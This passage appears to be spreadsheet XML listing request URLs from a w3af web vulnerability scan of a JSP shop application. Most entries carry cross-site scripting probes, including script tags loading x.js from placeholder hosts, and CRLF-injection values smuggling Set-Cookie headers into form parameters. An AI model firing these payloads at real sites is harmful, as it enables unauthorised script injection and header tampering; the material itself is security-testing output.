    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=emxib&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=&lt;script&gt;fake_alert(string.fromcharcode(48gj))&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=&lt;script/src=http://48gj/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=&lt;script&gt;a=/48gj/fake_alert(a.source)&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=&lt;_x0000_script&gt;fake_alert("48gj")&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=&lt;script/xss+src=http://48gj/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=&lt;script+src=http://48gj/x.js&gt;&lt;/script&gt;&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion='';!--"&lt;48gj&gt;=&amp;{()}&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=ghel3&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;_x0000_script&gt;fake_alert("ggge")&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert("ggge")&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos='';!--"&lt;ggge&gt;=&amp;{()}&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script/xss+src=http://ggge/x.js&gt;&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script&gt;fake_alert(string.fromcharcode(ggge))&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=&lt;script+src=http://ggge/x.js&gt;&lt;/script&gt;&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=iv1ja&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad='';!--"&lt;oiqk&gt;=&amp;{()}&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;a=/oiqk/fake_alert(a.source)&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;fake_alert(string.fromcharcode(oiqk))&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script&gt;fake_alert("oiqk")&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script+src=http://oiqk/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=&lt;script/xss+src=http://oiqk/x.js&gt;&lt;/script&gt;&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=agpi2</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo='';!--"&lt;7cty&gt;=&amp;{()}</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script+src=http://7cty/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script/xss+src=http://7cty/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script/src=http://7cty/x.js&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;fake_alert("7cty")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;a=/7cty/fake_alert(a.source)&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=&lt;script&gt;fake_alert(string.fromcharcode(7cty))&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=asqcw&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;fake_alert("jbqn")&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;fake_alert(string.fromcharcode(jbqn))&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script&gt;a=/jbqn/fake_alert(a.source)&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre='';!--"&lt;jbqn&gt;=&amp;{()}&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script+src=http://jbqn/x.js&gt;&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=&lt;script/src=http://jbqn/x.js&gt;&lt;/script&gt;&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=ge7gf&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script&gt;a=/zzfv/fake_alert(a.source)&lt;/script&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script&gt;fake_alert("zzfv")&lt;/script&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script&gt;fake_alert(string.fromcharcode(zzfv))&lt;/script&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script/xss+src=http://zzfv/x.js&gt;&lt;/script&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;_x0000_script&gt;fake_alert("zzfv")&lt;/script&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script/src=http://zzfv/x.js&gt;&lt;/script&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=&lt;script+src=http://zzfv/x.js&gt;&lt;/script&gt;&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=mop3d&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script&gt;a=/1wls/fake_alert(a.source)&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script&gt;fake_alert(string.fromcharcode(1wls))&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password='';!--"&lt;1wls&gt;=&amp;{()}&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script&gt;fake_alert("1wls")&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;_x0000_script&gt;fake_alert("1wls")&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=&lt;script+src=http://1wls/x.js&gt;&lt;/script&gt;&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script+src=http://99uv/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;fake_alert(string.fromcharcode(99uv))&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;_x0000_script&gt;fake_alert("99uv")&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email='';!--"&lt;99uv&gt;=&amp;{()}&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script/src=http://99uv/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script/xss+src=http://99uv/x.js&gt;&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;a=/99uv/fake_alert(a.source)&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=&lt;script&gt;fake_alert("99uv")&lt;/script&gt;&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=56&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?password=frame30.&amp;provincia=24&amp;login=17slr&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script&gt;a=/gmsq/fake_alert(a.source)&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script&gt;fake_alert(string.fromcharcode(gmsq))&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?cp=56&amp;provincia=24&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;email=w3af@email.com&amp;ciudad=buenos+aires&amp;nombre=john&amp;login=&lt;script+src=http://gmsq/x.js&gt;&lt;/script&gt;&amp;password=frame30.&amp;ntc=56&amp;modo=insertar</t>
  </si>
  <si>
    <t>CRLFi</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=set-cookie:+tamper=5532201756990587338&amp;login=pepe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set-cookie:tamper=5848483605102085562</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=any
set-cookie:+tamper=5532201756990587338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any?
set-cookie:+tamper=5532201756990587338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any?
set-cookie:+tamper=5532201756990587338
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set-cookie:+tamper=5532201756990587338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any
set-cookie:+tamper=5532201756990587338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any?
set-cookie:+tamper=5532201756990587338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anyset-cookie:+tamper=5532201756990587338&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=set-cookie:tamper=9116049879803913113</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=any</t>
  </si>
  <si>
    <t>set-cookie:tamper=9116049879803913113</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=any?set-cookie:+tamper=5532201756990587338&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=any?</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=any
set-cookie:+tamper=5532201756990587338
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any?
set-cookie:+tamper=5532201756990587338
&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=anyset-cookie:tamper=9116049879803913113</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=set-cookie:+tamper=5532201756990587338&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=any?set-cookie:tamper=9116049879803913113</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=any
set-cookie:+tamper=5532201756990587338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pepe&amp;nombre=any?
set-cookie:+tamper=5532201756990587338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pepe&amp;nombre=anyset-cookie:+tamper=5532201756990587338&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=set-cookie:+tamper=5230754489916261670&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=any?set-cookie:+tamper=5532201756990587338&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=any?</t>
  </si>
  <si>
    <t>set-cookie:+tamper=5230754489916261670&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=any?
set-cookie:+tamper=5532201756990587338
&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=anyset-cookie:+tamper=5230754489916261670&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=any?set-cookie:+tamper=5230754489916261670&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=5230754489916261670</t>
  </si>
  <si>
    <t>&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=set-cookie:+tamper=5532201756990587338&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=set-cookie:+tamper=5230754489916261670&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=any
set-cookie:+tamper=5532201756990587338&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=any</t>
  </si>
  <si>
    <t>set-cookie:+tamper=5230754489916261670&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=any?
